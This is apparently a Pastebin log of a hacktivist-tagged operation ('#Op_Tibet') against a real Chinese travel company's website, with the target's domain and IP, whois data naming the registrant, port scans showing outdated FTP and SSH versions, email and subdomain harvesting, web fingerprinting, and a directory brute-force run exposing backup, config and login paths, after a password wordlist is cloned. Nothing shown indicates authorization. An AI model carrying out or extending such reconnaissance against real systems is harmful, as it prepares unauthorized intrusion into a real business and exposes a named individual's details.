JTSEC1333

Untitled

Jan 27th, 2025
723
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 269.33 KB | None | 0 0
  1. ############################################################################################################################################################
  2. ============================================================================================================================================================
  3. /$$ /$$ /$$ /$$ /$$
  4. | $$ | $$ | $$ | $$ | $$
  5. | $$$$$$$ | $$ /$$$$$$ /$$$$$$$| $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$
  6. | $$__ $$| $$ |____ $$ /$$_____/| $$ /$$/| $$__ $$ |____ $$|_ $$_/
  7. | $$ \ $$| $$ /$$$$$$$| $$ | $$$$$$/ | $$ \ $$ /$$$$$$$ | $$
  8. | $$ | $$| $$ /$$__ $$| $$ | $$_ $$ | $$ | $$ /$$__ $$ | $$ /$$
  9. | $$$$$$$/| $$| $$$$$$$| $$$$$$$| $$ \ $$| $$ | $$| $$$$$$$ | $$$$/
  10. |_______/ |__/ \_______/ \_______/|__/ \__/|__/ |__/ \_______/ \___/
  11.  
  12. #Op_Tibet #Tibet #February 2020
  13.  
  14.  
  15. PENETRATION TESTING IN THE REAL WORLD...
  16.  
  17. protonvpn-cli -connect
  18.  
  19. root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git
  20. root@blackbox:~# cd wordlist/
  21. root@blackbox:~/wordlist# ls
  22. adobe_top100_password.txt passlist.txt router_default_password.md
  23. hydra.restore rdp_passlist.txt ssh_passwd.txt
  24. pass_list.rar README.md usernames.txt
  25.  
  26. TARGET: http://www.etours.cn/
  27. IP ADDRESS: 184.154.192.250
  28.  
  29.  
  30. NSLOOKUP DNS RECORDS A, NS, MX
  31.  
  32. root@blackbox:/# nslookup
  33. > set type=A
  34. > etours.cn
  35. Server: 192.168.1.1
  36. Address: 192.168.1.1#53
  37.  
  38. Non-authoritative answer:
  39. Name: etours.cn
  40. Address: 184.154.192.250
  41.  
  42. > set type=NS
  43. > etours.cn
  44. Server: 192.168.1.1
  45. Address: 192.168.1.1#53
  46.  
  47. Non-authoritative answer:
  48. etours.cn nameserver = ns20.xincache.com.
  49. etours.cn nameserver = ns19.xincache.com.
  50.  
  51. Authoritative answers can be found from:
  52.  
  53. > set type=MX
  54. > etours.cn
  55. Server: 192.168.1.1
  56. Address: 192.168.1.1#53
  57.  
  58. Non-authoritative answer:
  59. etours.cn mail exchanger = 10 mail.etours.cn.
  60.  
  61. Authoritative answers can be found from:
  62. > exit
  63.  
  64.  
  65. DIG DNS RECORDS A, NS, MX
  66.  
  67. root@blackbox:/# dig etours.cn A
  68.  
  69. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn A
  70. ;; global options: +cmd
  71. ;; Got answer:
  72. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12778
  73. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  74.  
  75. ;; OPT PSEUDOSECTION:
  76. ; EDNS: version: 0, flags:; udp: 4096
  77. ;; QUESTION SECTION:
  78. ;etours.cn. IN A
  79.  
  80. ;; ANSWER SECTION:
  81. etours.cn. 2586 IN A 184.154.192.250
  82.  
  83. ;; Query time: 1069 msec
  84. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  85. ;; WHEN: Wed Jan 22 13:34:44 CST 2020
  86. ;; MSG SIZE rcvd: 54
  87.  
  88. root@blackbox:/# dig etours.cn NS
  89.  
  90. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn NS
  91. ;; global options: +cmd
  92. ;; Got answer:
  93. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21169
  94. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
  95.  
  96. ;; OPT PSEUDOSECTION:
  97. ; EDNS: version: 0, flags:; udp: 4096
  98. ;; QUESTION SECTION:
  99. ;etours.cn. IN NS
  100.  
  101. ;; ANSWER SECTION:
  102. etours.cn. 3506 IN NS ns19.xincache.com.
  103. etours.cn. 3506 IN NS ns20.xincache.com.
  104.  
  105. ;; Query time: 44 msec
  106. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  107. ;; WHEN: Wed Jan 22 13:35:12 CST 2020
  108. ;; MSG SIZE rcvd: 88
  109.  
  110.  
  111. root@blackbox:/# dig etours.cn MX
  112.  
  113. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn MX
  114. ;; global options: +cmd
  115. ;; Got answer:
  116. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37222
  117. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  118.  
  119. ;; OPT PSEUDOSECTION:
  120. ; EDNS: version: 0, flags:; udp: 4096
  121. ;; QUESTION SECTION:
  122. ;etours.cn. IN MX
  123.  
  124. ;; ANSWER SECTION:
  125. etours.cn. 3520 IN MX 10 mail.etours.cn.
  126.  
  127. ;; Query time: 49 msec
  128. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  129. ;; WHEN: Wed Jan 22 13:35:34 CST 2020
  130. ;; MSG SIZE rcvd: 59
  131.  
  132.  
  133. WHOIS DNSLYTICS
  134.  
  135. https://dnslytics.com/whois-lookup/etours.cn
  136.  
  137. WHOIS
  138.  
  139. root@blackbox:/opt# whois etours.cn
  140. Domain Name: etours.cn
  141. ROID: 20040108s10001s00945986-cn
  142. Domain Status: clientUpdateProhibited
  143. Domain Status: clientTransferProhibited
  144. Registrant ID: hr4iv3jdc2gd6
  145. Registrant: 李如勤
  146. Registrant Contact Email: [email protected]
  147. Sponsoring Registrar: 北京新网数码信息技术有限公司
  148. Name Server: ns19.xincache.com
  149. Name Server: ns20.xincache.com
  150. Registration Time: 2004-01-08 15:51:40
  151. Expiration Time: 2029-01-08 15:51:40
  152. DNSSEC: unsigned
  153.  
  154.  
  155. DMITRY IP ADDRESS
  156.  
  157. root@blackbox:/opt# dmitry -winsepfb host 184.154.192.250
  158. Deepmagic Information Gathering Tool
  159. "There be some deep magic going on"
  160.  
  161. HostIP:184.154.192.250
  162. HostName:server.etours.cn
  163.  
  164. Gathered Inet-whois information for 184.154.192.250
  165. ---------------------------------
  166.  
  167.  
  168. inetnum: 180.235.0.0 - 184.255.255.255
  169. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  170. descr: IPv4 address block not managed by the RIPE NCC
  171. remarks: ------------------------------------------------------
  172. remarks:
  173. remarks: For registration information,
  174. remarks: you can consult the following sources:
  175. remarks:
  176. remarks: IANA
  177. remarks: http://www.iana.org/assignments/ipv4-address-space
  178. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  179. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  180. remarks:
  181. remarks: AFRINIC (Africa)
  182. remarks: http://www.afrinic.net/ whois.afrinic.net
  183. remarks:
  184. remarks: APNIC (Asia Pacific)
  185. remarks: http://www.apnic.net/ whois.apnic.net
  186. remarks:
  187. remarks: ARIN (Northern America)
  188. remarks: http://www.arin.net/ whois.arin.net
  189. remarks:
  190. remarks: LACNIC (Latin America and the Carribean)
  191. remarks: http://www.lacnic.net/ whois.lacnic.net
  192. remarks:
  193. remarks: ------------------------------------------------------
  194. country: EU # Country is really world wide
  195. admin-c: IANA1-RIPE
  196. tech-c: IANA1-RIPE
  197. status: ALLOCATED UNSPECIFIED
  198. mnt-by: RIPE-NCC-HM-MNT
  199. created: 2019-01-07T10:49:46Z
  200. last-modified: 2019-01-07T10:49:46Z
  201. source: RIPE
  202.  
  203. role: Internet Assigned Numbers Authority
  204. address: see http://www.iana.org.
  205. admin-c: IANA1-RIPE
  206. tech-c: IANA1-RIPE
  207. nic-hdl: IANA1-RIPE
  208. remarks: For more information on IANA services
  209. remarks: go to IANA web site at http://www.iana.org.
  210. mnt-by: RIPE-NCC-MNT
  211. created: 1970-01-01T00:00:00Z
  212. last-modified: 2001-09-22T09:31:27Z
  213. source: RIPE # Filtered
  214.  
  215. % This query was served by the RIPE Database Query Service version 1.96 (ANGUS)
  216.  
  217.  
  218.  
  219. Gathered Inic-whois information for server.etours.cn
  220. ---------------------------------
  221.  
  222. Gathered Netcraft information for server.etours.cn
  223. ---------------------------------
  224.  
  225. Retrieving Netcraft.com information for server.etours.cn
  226. Netcraft.com Information gathered
  227.  
  228. Gathered Subdomain information for server.etours.cn
  229. ---------------------------------
  230. Searching Google.com:80...
  231. Searching Altavista.com:80...
  232. Found 0 possible subdomain(s) for host server.etours.cn, Searched 0 pages containing 0 results
  233.  
  234. Gathered E-Mail information for server.etours.cn
  235. ---------------------------------
  236. Searching Google.com:80...
  237. Searching Altavista.com:80...
  238. Found 0 E-Mail(s) for host server.etours.cn, Searched 0 pages containing 0 results
  239.  
  240. Gathered TCP Port information for 184.154.192.250
  241. ---------------------------------
  242.  
  243. Port State
  244.  
  245. 21/tcp open
  246. >> 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  247.  
  248. 22/tcp open
  249. >> SSH-2.0-OpenSSH_4.3
  250.  
  251. 25/tcp open
  252. >> 220 server.etours.cn ESMTP
  253.  
  254. 53/tcp open
  255.  
  256. Portscan Finished: Scanned 150 ports, 145 ports were in state closed
  257.  
  258.  
  259. All scans completed, exiting
  260.  
  261. DMITRY DOMAIN
  262.  
  263. root@blackbox:/opt# dmitry -winsepfb host etours.cn
  264. Deepmagic Information Gathering Tool
  265. "There be some deep magic going on"
  266.  
  267. HostIP:184.154.192.250
  268. HostName:etours.cn
  269.  
  270. Gathered Inet-whois information for 184.154.192.250
  271. ---------------------------------
  272.  
  273.  
  274. inetnum: 180.235.0.0 - 184.255.255.255
  275. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  276. descr: IPv4 address block not managed by the RIPE NCC
  277. remarks: ------------------------------------------------------
  278. remarks:
  279. remarks: For registration information,
  280. remarks: you can consult the following sources:
  281. remarks:
  282. remarks: IANA
  283. remarks: http://www.iana.org/assignments/ipv4-address-space
  284. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  285. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  286. remarks:
  287. remarks: AFRINIC (Africa)
  288. remarks: http://www.afrinic.net/ whois.afrinic.net
  289. remarks:
  290. remarks: APNIC (Asia Pacific)
  291. remarks: http://www.apnic.net/ whois.apnic.net
  292. remarks:
  293. remarks: ARIN (Northern America)
  294. remarks: http://www.arin.net/ whois.arin.net
  295. remarks:
  296. remarks: LACNIC (Latin America and the Carribean)
  297. remarks: http://www.lacnic.net/ whois.lacnic.net
  298. remarks:
  299. remarks: ------------------------------------------------------
  300. country: EU # Country is really world wide
  301. admin-c: IANA1-RIPE
  302. tech-c: IANA1-RIPE
  303. status: ALLOCATED UNSPECIFIED
  304. mnt-by: RIPE-NCC-HM-MNT
  305. created: 2019-01-07T10:49:46Z
  306. last-modified: 2019-01-07T10:49:46Z
  307. source: RIPE
  308.  
  309. role: Internet Assigned Numbers Authority
  310. address: see http://www.iana.org.
  311. admin-c: IANA1-RIPE
  312. tech-c: IANA1-RIPE
  313. nic-hdl: IANA1-RIPE
  314. remarks: For more information on IANA services
  315. remarks: go to IANA web site at http://www.iana.org.
  316. mnt-by: RIPE-NCC-MNT
  317. created: 1970-01-01T00:00:00Z
  318. last-modified: 2001-09-22T09:31:27Z
  319. source: RIPE # Filtered
  320.  
  321. % This query was served by the RIPE Database Query Service version 1.96 (WAGYU)
  322.  
  323.  
  324.  
  325. Gathered Inic-whois information for etours.cn
  326. ---------------------------------
  327. Domain Name: etours.cn
  328. ROID: 20040108s10001s00945986-cn
  329. Domain Status: clientUpdateProhibited
  330. Domain Status: clientTransferProhibited
  331. Registrant ID: hr4iv3jdc2gd6
  332. Registrant: 李如勤
  333. Registrant Contact Email: [email protected]
  334. Sponsoring Registrar: 北京新网数码信息技术有限公司
  335. Name Server: ns19.xincache.com
  336. Name Server: ns20.xincache.com
  337. Registration Time: 2004-01-08 15:51:40
  338. Expiration Time: 2029-01-08 15:51:40
  339. DNSSEC: unsigned
  340.  
  341. Gathered Netcraft information for etours.cn
  342. ---------------------------------
  343.  
  344. Retrieving Netcraft.com information for etours.cn
  345. Netcraft.com Information gathered
  346.  
  347. Gathered Subdomain information for etours.cn
  348. ---------------------------------
  349. Searching Google.com:80...
  350. HostName:www.etours.cn
  351. HostIP:184.154.192.250
  352. HostName:beijing.etours.cn
  353. HostIP:184.154.192.250
  354. Searching Altavista.com:80...
  355. Found 2 possible subdomain(s) for host etours.cn, Searched 0 pages containing 0 results
  356.  
  357. Gathered E-Mail information for etours.cn
  358. ---------------------------------
  359. Searching Google.com:80...
  360. Searching Altavista.com:80...
  361. Found 0 E-Mail(s) for host etours.cn, Searched 0 pages containing 0 results
  362.  
  363. Gathered TCP Port information for 184.154.192.250
  364. ---------------------------------
  365.  
  366. Port State
  367.  
  368. 21/tcp open
  369. >> 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  370.  
  371. 22/tcp open
  372. >> SSH-2.0-OpenSSH_4.3
  373.  
  374. 25/tcp open
  375. >> 220 server.etours.cn ESMTP
  376.  
  377. 53/tcp open
  378.  
  379. Portscan Finished: Scanned 150 ports, 145 ports were in state closed
  380.  
  381.  
  382. All scans completed, exiting
  383.  
  384.  
  385.  
  386. SHODAN CHECK
  387.  
  388. https://www.shodan.io/host/184.154.192.250/raw
  389.  
  390.  
  391. SEND A GET REQUEST
  392.  
  393. chrome-extension://aejoelaoggembcahagimdiliamlcdmfm/index.html
  394.  
  395. GET / HTTP/1.1
  396. Host: 184.154.192.250
  397.  
  398. HTTP/1.1 200 OK
  399. Date: Wed, 22 Jan 2020 19:57:07 GMT
  400. Server: Apache
  401. X-Powered-By: PleskLin
  402. Connection: close
  403. Transfer-Encoding: chunked
  404. Content-Type: text/html
  405.  
  406. Tel: (+86) 10 67160201 ext 1006, 1007
  407. Fax: (+86) 10 67160150 67160130
  408. Add: 2001-1-1,Linghangguoji, Guangqumen, Dongcheng Dist, Beijing, China<br>
  409. License No.L-BJ-01220
  410.  
  411.  
  412. TEST EMAIL ADDRESS
  413.  
  414. https://dnslytics.com/email-test
  415.  
  416.  
  417. Testing e-mail address: [email protected]
  418. Number of mail server: 1
  419. Mail server Details Status
  420. mail.etours.cn
  421. Checking server mail.etours.cn...
  422.  
  423. Opening up socket to mail.etours.cn... Succes!
  424.  
  425. mail.etours.cn replied:
  426. HELO www.dnslytics.com
  427. (7002.86 ms)
  428. MAIL FROM: <[email protected]>
  429. (7007.18 ms)
  430. RCPT TO: <[email protected]>
  431. (7007.18 ms)
  432. QUIT
  433. (7007.12 ms)
  434. Successful communication with mail.etours.cn assuming OKsuccess
  435.  
  436.  
  437. OK success
  438. Email delivery for [email protected] is successful for all mail servers!
  439.  
  440.  
  441. TRANSLATE REGISTRANT NAME:
  442.  
  443. 李如勤 = Li Ruqin
  444.  
  445.  
  446. EMAIL HARVESTER
  447.  
  448. root@blackbox:/# cd /opt/
  449. root@blackbox:/opt# git clone https://github.com/laramies/theHarvester.git
  450. root@blackbox:/opt# cd theHarvester/
  451. root@blackbox:/opt/theHarvester# pip3 install -r requirements.txt
  452. root@blackbox:/opt/theHarvester# ./theHarvester.py -d etours.cn -l 500 -b all
  453.  
  454. *******************************************************************
  455. * _ _ _ *
  456. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  457. * | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  458. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  459. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  460. * *
  461. * theHarvester 3.1.1dev3 *
  462. * Coded by Christian Martorella *
  463. * Edge-Security Research *
  464. * *
  465. *******************************************************************
  466.  
  467.  
  468. [*] Target: etours.cn
  469.  
  470.  
  471. [*] IPs found: 14
  472. -------------------
  473. 8.5.1.33
  474. 34.212.104.30
  475. 45.204.167.102
  476. 50.63.202.16
  477. 52.84.3.40
  478. 52.84.3.100
  479. 52.84.3.239
  480. 52.84.3.252
  481. 52.84.64.42
  482. 104.27.138.30
  483. 104.27.139.30
  484. 124.16.31.152
  485. 154.222.178.247
  486. 184.154.192.250
  487.  
  488. [*] Emails found: 1
  489. ----------------------
  490.  
  491.  
  492. https://dnslytics.com/email-test
  493.  
  494. Testing e-mail address: [email protected]
  495. Number of mail server: 1
  496. Mail server Details Status
  497. mail.etours.cn
  498. Checking server mail.etours.cn...
  499.  
  500. Opening up socket to mail.etours.cn... Succes!
  501.  
  502. mail.etours.cn replied:
  503. HELO www.dnslytics.com
  504. (7002.05 ms)
  505. MAIL FROM: <[email protected]>
  506. (7003.72 ms)
  507. RCPT TO: <[email protected]>
  508. (7007.17 ms)
  509. QUIT
  510. (7004.80 ms)
  511. Successful communication with mail.etours.cn assuming OKsuccess
  512.  
  513.  
  514. OK success
  515. Email delivery for [email protected] is successful for all mail servers!
  516.  
  517.  
  518.  
  519. [*] Hosts found: 46
  520. ---------------------
  521. beijing.etours.cn:184.154.192.250
  522. c-domain__target--beijing.etours.cn:
  523. c-domain__target--mail.etours.cn:
  524. changdetours.cn:
  525. chinawinetours.cn:184.168.131.241
  526. dragongatetours.cn:104.27.139.30, 104.27.138.30
  527. etours.cn:184.154.192.250
  528. httpacnow.netbeijing.etours.cn:
  529. httpacnow.netwww.etours.cn:
  530. httpbeijing.etours.cn:
  531. httpsseo.5118.combeijing.etours.cn:
  532. httpswww.keyword-suggest-tool.comsearchbeijing.etours.cn:
  533. httpwww.etours.cn:
  534. mail.etours.cn:184.154.192.250
  535. seetours.cn:
  536. server.etours.cn:
  537. taketours.cn:34.212.104.30
  538. www.3etours.cn:122.10.82.47, 103.97.19.67
  539. www.beijing.etours.cn:
  540. www.dragongatetours.cn:104.27.138.30, 104.27.139.30
  541. www.etours.cn:184.154.192.250
  542. www.lovetours.cn:154.222.178.247
  543. www.seetours.cn:2.16.135.32, 2.16.135.42
  544. www.taketours.cn:34.212.104.30
  545.  
  546.  
  547. WHATRUNS 184.154.192.250
  548.  
  549. https://www.whatruns.com/website/etours.cn
  550.  
  551. Hosting Panel
  552. Plesk
  553.  
  554. Programming Language
  555. PHP 5.3.10
  556.  
  557. Web Server
  558. Apache 2.4.6
  559.  
  560.  
  561. WHATWEB
  562.  
  563. root@blackbox:~/WhatWeb# ./whatweb
  564.  
  565. .$$$ $. .$$$ $.
  566. $$$$ $$. .$$$ $$$ .$$$$$$. .$$$$$$$$$$. $$$$ $$. .$$$$$$$. .$$$$$$.
  567. $ $$ $$$ $ $$ $$$ $ $$$$$$. $$$$$ $$$$$$ $ $$ $$$ $ $$ $$ $ $$$$$$.
  568. $ `$ $$$ $ `$ $$$ $ `$ $$$ $$' $ `$ `$$ $ `$ $$$ $ `$ $ `$ $$$'
  569. $. $ $$$ $. $$$$$$ $. $$$$$$ `$ $. $ :' $. $ $$$ $. $$$$ $. $$$$$.
  570. $::$ . $$$ $::$ $$$ $::$ $$$ $::$ $::$ . $$$ $::$ $::$ $$$$
  571. $;;$ $$$ $$$ $;;$ $$$ $;;$ $$$ $;;$ $;;$ $$$ $$$ $;;$ $;;$ $$$$
  572. $$$$$$ $$$$$ $$$$ $$$ $$$$ $$$ $$$$ $$$$$$ $$$$$ $$$$$$$$$ $$$$$$$$$'
  573.  
  574.  
  575. WhatWeb - Next generation web scanner version 0.5.1.
  576. Developed by Andrew Horton (urbanadventurer) and Brendan Coles (bcoles)
  577. Homepage: https://www.morningstarsecurity.com/research/whatweb
  578.  
  579.  
  580. root@blackbox:~# git clone https://github.com/urbanadventurer/WhatWeb.git
  581.  
  582. root@blackbox:~/WhatWeb# ./whatweb -v -a 4 etours.cn
  583.  
  584. WhatWeb report for http://www.etours.cn/
  585. Status : 200 OK
  586. Title : China Travel Service, China Tours, China Travel - China eTours Travel Service
  587. IP : 184.154.192.250
  588. Country : UNITED STATES, US
  589.  
  590. Summary : Script[text/javascript], Meta-Author[www.eTours.cn], HTTPServer[Apache], JQuery[1.4.2], Plesk[Lin], Email[[email protected]], Apache, X-Powered-By[PleskLin]
  591.  
  592. Detected Plugins:
  593. [ Apache ]
  594. The Apache HTTP Server Project is an effort to develop and
  595. maintain an open-source HTTP server for modern operating
  596. systems including UNIX and Windows NT. The goal of this
  597. project is to provide a secure, efficient and extensible
  598. server that provides HTTP services in sync with the current
  599. HTTP standards.
  600.  
  601. Google Dorks: (3)
  602. Website : http://httpd.apache.org/
  603.  
  604. [ Email ]
  605. Extract email addresses. Find valid email address and
  606. syntactically invalid email addresses from mailto: link
  607. tags. We match syntactically invalid links containing
  608. mailto: to catch anti-spam email addresses, eg. bob at
  609. gmail.com. This uses the simplified email regular
  610. expression from
  611. http://www.regular-expressions.info/email.html for valid
  612. email address matching.
  613.  
  614.  
  615. [ HTTPServer ]
  616. HTTP server header string. This plugin also attempts to
  617. identify the operating system from the server header.
  618.  
  619. String : Apache (from server string)
  620.  
  621. [ JQuery ]
  622. A fast, concise, JavaScript that simplifies how to traverse
  623. HTML documents, handle events, perform animations, and add
  624. AJAX.
  625.  
  626. Version : 1.4.2
  627. Website : http://jquery.com/
  628.  
  629. [ Meta-Author ]
  630. This plugin retrieves the author name from the meta name
  631. tag - info:
  632. http://www.webmarketingnow.com/tips/meta-tags-uncovered.html
  633. #author
  634.  
  635. String : www.eTours.cn
  636.  
  637. [ Plesk ]
  638. Plesk is a web control panel
  639.  
  640. String : Lin
  641. Google Dorks: (1)
  642. Website : http://www.parallels.com/products/plesk/
  643.  
  644. [ Script ]
  645. This plugin detects instances of script HTML elements and
  646. returns the script language/type.
  647.  
  648. String : text/javascript
  649.  
  650. [ X-Powered-By ]
  651. X-Powered-By HTTP header
  652.  
  653. String : PleskLin (from x-powered-by string)
  654.  
  655. HTTP Headers:
  656. HTTP/1.1 200 OK
  657. Date: Thu, 23 Jan 2020 15:47:15 GMT
  658. Server: Apache
  659. X-Powered-By: PleskLin
  660. Connection: close
  661. Transfer-Encoding: chunked
  662. Content-Type: text/html
  663.  
  664.  
  665.  
  666. root@blackbox:/opt# dirb http://184.154.192.250/ /usr/share/wordlists/dirb/common.txt
  667.  
  668. -----------------
  669. DIRB v2.22
  670. By The Dark Raver
  671. -----------------
  672.  
  673. START_TIME: Wed Jan 22 15:18:24 2020
  674. URL_BASE: http://184.154.192.250/
  675. WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
  676.  
  677.  
  678. HTTP STATUS CODES:
  679.  
  680.  
  681. https://miro.medium.com/max/1530/0*BX8QCIGzEMtRvoJN.png
  682.  
  683. CODE - STATUS
  684. 200 - OK
  685. 301 - MOVED PERMANENTLY
  686. 302 - FOUND
  687. 401 - UNAUTHORIZED
  688. 403 - FORBIDDEN
  689. 500 - Internal Server Error
  690.  
  691.  
  692. -----------------
  693.  
  694. GENERATED WORDS: 4612
  695.  
  696. ---- Scanning URL: http://184.154.192.250/ ----
  697. + http://184.154.192.250/_db_backups (CODE:401|SIZE:1211)
  698. + http://184.154.192.250/admin.pl (CODE:403|SIZE:954)
  699. + http://184.154.192.250/atom (CODE:301|SIZE:0)
  700. + http://184.154.192.250/cgi-bin/ (CODE:403|SIZE:954)
  701. + http://184.154.192.250/favicon.ico (CODE:200|SIZE:0)
  702. + http://184.154.192.250/index.php (CODE:200|SIZE:19887)
  703. + http://184.154.192.250/page1 (CODE:301|SIZE:0)
  704. + http://184.154.192.250/page2 (CODE:301|SIZE:0)
  705. + http://184.154.192.250/php.ini (CODE:200|SIZE:389)
  706. + http://184.154.192.250/plesk-stat (CODE:301|SIZE:301)
  707. + http://184.154.192.250/rdf (CODE:301|SIZE:0)
  708. + http://184.154.192.250/rss (CODE:301|SIZE:0)
  709. + http://184.154.192.250/rss2 (CODE:301|SIZE:0)
  710. + http://184.154.192.250/sitemap.xml (CODE:200|SIZE:78004)
  711. + http://184.154.192.250/usage (CODE:403|SIZE:954)
  712. + http://184.154.192.250/web.xml (CODE:200|SIZE:679)
  713. + http://184.154.192.250/webstat (CODE:301|SIZE:298)
  714.  
  715. ---- Entering directory: http://184.154.192.250/0/ ----
  716. + http://184.154.192.250/0/index.php (CODE:301|SIZE:0)
  717.  
  718. ---- Entering directory: http://184.154.192.250/2011/ ----
  719. + http://184.154.192.250/2011/13 (CODE:200|SIZE:13756)
  720. + http://184.154.192.250/2011/14 (CODE:200|SIZE:13756)
  721. + http://184.154.192.250/2011/15 (CODE:200|SIZE:13756)
  722. + http://184.154.192.250/2011/20 (CODE:200|SIZE:13756)
  723. + http://184.154.192.250/2011/21 (CODE:200|SIZE:13756)
  724. + http://184.154.192.250/2011/22 (CODE:200|SIZE:13756)
  725. + http://184.154.192.250/2011/23 (CODE:200|SIZE:13756)
  726. + http://184.154.192.250/2011/24 (CODE:200|SIZE:13756)
  727. + http://184.154.192.250/2011/25 (CODE:200|SIZE:13756)
  728. + http://184.154.192.250/2011/30 (CODE:200|SIZE:13756)
  729. + http://184.154.192.250/2011/32 (CODE:200|SIZE:13756)
  730. + http://184.154.192.250/2011/42 (CODE:200|SIZE:13756)
  731. + http://184.154.192.250/2011/50 (CODE:200|SIZE:13756)
  732. + http://184.154.192.250/2011/51 (CODE:200|SIZE:13756)
  733. + http://184.154.192.250/2011/64 (CODE:200|SIZE:13756)
  734. + http://184.154.192.250/2011/96 (CODE:200|SIZE:13756)
  735. + http://184.154.192.250/2011/atom (CODE:301|SIZE:0)
  736. + http://184.154.192.250/2011/index.php (CODE:301|SIZE:0)
  737. + http://184.154.192.250/2011/page1 (CODE:301|SIZE:0)
  738. + http://184.154.192.250/2011/page2 (CODE:301|SIZE:0)
  739. + http://184.154.192.250/2011/rdf (CODE:301|SIZE:0)
  740. + http://184.154.192.250/2011/rss (CODE:301|SIZE:0)
  741. + http://184.154.192.250/2011/rss2 (CODE:301|SIZE:0)
  742.  
  743. ---- Entering directory: http://184.154.192.250/2012/ ----
  744. + http://184.154.192.250/2012/13 (CODE:200|SIZE:13756)
  745. + http://184.154.192.250/2012/14 (CODE:200|SIZE:13756)
  746. + http://184.154.192.250/2012/15 (CODE:200|SIZE:13756)
  747. + http://184.154.192.250/2012/20 (CODE:200|SIZE:13756)
  748. + http://184.154.192.250/2012/21 (CODE:200|SIZE:13756)
  749. + http://184.154.192.250/2012/22 (CODE:200|SIZE:13756)
  750. + http://184.154.192.250/2012/23 (CODE:200|SIZE:13756)
  751. + http://184.154.192.250/2012/24 (CODE:200|SIZE:13756)
  752. + http://184.154.192.250/2012/25 (CODE:200|SIZE:13756)
  753. + http://184.154.192.250/2012/30 (CODE:200|SIZE:13756)
  754. + http://184.154.192.250/2012/32 (CODE:200|SIZE:13756)
  755. + http://184.154.192.250/2012/42 (CODE:200|SIZE:13756)
  756. + http://184.154.192.250/2012/50 (CODE:200|SIZE:13756)
  757. + http://184.154.192.250/2012/51 (CODE:200|SIZE:13756)
  758. + http://184.154.192.250/2012/64 (CODE:200|SIZE:13756)
  759. + http://184.154.192.250/2012/96 (CODE:200|SIZE:13756)
  760. + http://184.154.192.250/2012/atom (CODE:301|SIZE:0)
  761. + http://184.154.192.250/2012/index.php (CODE:301|SIZE:0)
  762. + http://184.154.192.250/2012/page1 (CODE:301|SIZE:0)
  763. + http://184.154.192.250/2012/page2 (CODE:301|SIZE:0)
  764. + http://184.154.192.250/2012/rdf (CODE:301|SIZE:0)
  765. + http://184.154.192.250/2012/rss (CODE:301|SIZE:0)
  766. + http://184.154.192.250/2012/rss2 (CODE:301|SIZE:0)
  767.  
  768. ---- Entering directory: http://184.154.192.250/about_us/ ----
  769. + http://184.154.192.250/about_us/admin.pl (CODE:403|SIZE:954)
  770. + http://184.154.192.250/about_us/index.php (CODE:200|SIZE:31320)
  771.  
  772. ---- Entering directory: http://184.154.192.250/ads/ ----
  773. + http://184.154.192.250/ads/admin.pl (CODE:403|SIZE:954)
  774. + http://184.154.192.250/ads/index.php (CODE:301|SIZE:0)
  775.  
  776. ---- Entering directory: http://184.154.192.250/backup/ ----
  777. + http://184.154.192.250/backup/admin.pl (CODE:403|SIZE:954)
  778. + http://184.154.192.250/backup/index.php (CODE:301|SIZE:0)
  779.  
  780. ---- Entering directory: http://184.154.192.250/blog/ ----
  781. + http://184.154.192.250/blog/admin (CODE:302|SIZE:0)
  782. + http://184.154.192.250/blog/admin.pl (CODE:403|SIZE:954)
  783. + http://184.154.192.250/blog/atom (CODE:301|SIZE:0)
  784. + http://184.154.192.250/blog/dashboard (CODE:302|SIZE:0)
  785. + http://184.154.192.250/blog/index.php (CODE:301|SIZE:0)
  786. + http://184.154.192.250/blog/login (CODE:302|SIZE:0)
  787. + http://184.154.192.250/blog/page1 (CODE:301|SIZE:0)
  788. + http://184.154.192.250/blog/page2 (CODE:301|SIZE:0)
  789. + http://184.154.192.250/blog/rdf (CODE:301|SIZE:0)
  790. + http://184.154.192.250/blog/rss (CODE:301|SIZE:0)
  791. + http://184.154.192.250/blog/rss2 (CODE:301|SIZE:0)
  792. + http://184.154.192.250/blog/xmlrpc.php (CODE:405|SIZE:42)
  793.  
  794. ---- Entering directory: http://184.154.192.250/Blog/ ----
  795. + http://184.154.192.250/Blog/atom (CODE:301|SIZE:0)
  796. + http://184.154.192.250/Blog/index.php (CODE:301|SIZE:0)
  797. + http://184.154.192.250/Blog/page1 (CODE:301|SIZE:0)
  798. + http://184.154.192.250/Blog/page2 (CODE:301|SIZE:0)
  799. + http://184.154.192.250/Blog/rdf (CODE:301|SIZE:0)
  800. + http://184.154.192.250/Blog/rss (CODE:301|SIZE:0)
  801. + http://184.154.192.250/Blog/rss2 (CODE:301|SIZE:0)
  802.  
